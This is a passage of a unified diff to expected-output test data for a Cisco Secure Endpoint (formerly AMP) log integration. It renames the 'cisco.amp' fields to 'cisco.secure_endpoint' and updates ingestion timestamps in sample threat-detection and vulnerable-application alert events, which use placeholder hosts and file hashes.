+                "ingested": "2021-09-27T00:41:08.619318845Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669671340605000,\"timestamp\":1610706060,\"timestamp_nanoseconds\":333000000,\"date\":\"2021-01-15T10:21:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669671340605487\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2012,7 +1997,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -2090,7 +2075,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:41.546129388Z",
+                "ingested": "2021-09-27T00:41:08.619320591Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669671340605000,\"timestamp\":1610706060,\"timestamp_nanoseconds\":195000000,\"date\":\"2021-01-15T10:21:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669671340605486\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2101,7 +2086,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -2175,7 +2160,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:41.546131467Z",
+                "ingested": "2021-09-27T00:41:08.619322298Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669671340605000,\"timestamp\":1610706060,\"timestamp_nanoseconds\":170000000,\"date\":\"2021-01-15T10:21:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669671340605485\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2186,7 +2171,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -2260,7 +2245,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:41.546133663Z",
+                "ingested": "2021-09-27T00:41:08.619324132Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669667045638000,\"timestamp\":1610706059,\"timestamp_nanoseconds\":779000000,\"date\":\"2021-01-15T10:20:59+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669667045638188\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2271,7 +2256,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -2339,7 +2324,7 @@
             },
             "event": {
                 "severity": 1,
-                "ingested": "2021-09-13T18:06:41.546135710Z",
+                "ingested": "2021-09-27T00:41:08.619325873Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":15210587194928,\"timestamp\":1610706000,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-15T10:20:00+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1610706000,\"start_date\":\"2021-01-15T10:20:00+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f5:8f:96:c3:53:1c\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"firefox.exe\",\"identity\":{\"sha256\":\"4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894\"}}},\"vulnerabilities\":[{\"name\":\"Mozilla Firefox\",\"version\":\"41.0\",\"cve\":\"CVE-2015-7204\",\"score\":\"6.8\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7204\"}]}}",
                 "kind": "alert",
                 "start": "2021-01-15T10:20:00.000Z",
@@ -2350,7 +2335,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -2442,7 +2427,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:41.546137800Z",
+                "ingested": "2021-09-27T00:41:08.619327604Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669409347600000,\"timestamp\":1610705999,\"timestamp_nanoseconds\":257000000,\"date\":\"2021-01-15T10:19:59+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669409347600427\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2453,7 +2438,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -2527,7 +2512,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:41.546139831Z",
+                "ingested": "2021-09-27T00:41:08.619329338Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669409347600000,\"timestamp\":1610705999,\"timestamp_nanoseconds\":240000000,\"date\":\"2021-01-15T10:19:59+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669409347600426\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2538,7 +2523,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -2612,7 +2597,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:41.546141890Z",
+                "ingested": "2021-09-27T00:41:08.619331077Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669405052633000,\"timestamp\":1610705998,\"timestamp_nanoseconds\":847000000,\"date\":\"2021-01-15T10:19:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669405052633129\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2623,7 +2608,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -2701,7 +2686,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:41.546143930Z",
+                "ingested": "2021-09-27T00:41:08.619332801Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669147354595000,\"timestamp\":1610705938,\"timestamp_nanoseconds\":375000000,\"date\":\"2021-01-15T10:18:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669147354595368\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2712,7 +2697,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -2786,7 +2771,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:41.546145982Z",
+                "ingested": "2021-09-27T00:41:08.619334524Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669147354595000,\"timestamp\":1610705938,\"timestamp_nanoseconds\":360000000,\"date\":\"2021-01-15T10:18:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669147354595367\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2797,7 +2782,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -2871,7 +2856,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:41.546148086Z",
+                "ingested": "2021-09-27T00:41:08.619336260Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669143059628000,\"timestamp\":1610705937,\"timestamp_nanoseconds\":968000000,\"date\":\"2021-01-15T10:18:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669143059628070\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2882,7 +2867,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -2950,7 +2935,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:41.546150194Z",
+                "ingested": "2021-09-27T00:41:08.619337963Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259286289613000,\"timestamp\":1610705905,\"timestamp_nanoseconds\":669000000,\"date\":\"2021-01-15T10:18:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259286289612895\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2961,7 +2946,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "GenericKD:Dyreza-tpd",
                     "computer": {
                         "active": true,
@@ -3029,7 +3014,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:41.546152267Z",
+                "ingested": "2021-09-27T00:41:08.619339685Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259234750005000,\"timestamp\":1610705893,\"timestamp_nanoseconds\":657000000,\"date\":\"2021-01-15T10:18:13+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259234750005342\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3040,7 +3025,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "GenericKD:Dyreza-tpd",
                     "computer": {
                         "active": true,
@@ -3108,7 +3093,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:41.546154327Z",
+                "ingested": "2021-09-27T00:41:08.619341438Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259183210398000,\"timestamp\":1610705881,\"timestamp_nanoseconds\":645000000,\"date\":\"2021-01-15T10:18:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259183210397789\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3119,7 +3104,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "GenericKD:Dyreza-tpd",
                     "computer": {
                         "active": true,
@@ -3206,7 +3191,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:41.546156486Z",
+                "ingested": "2021-09-27T00:41:08.619343258Z",
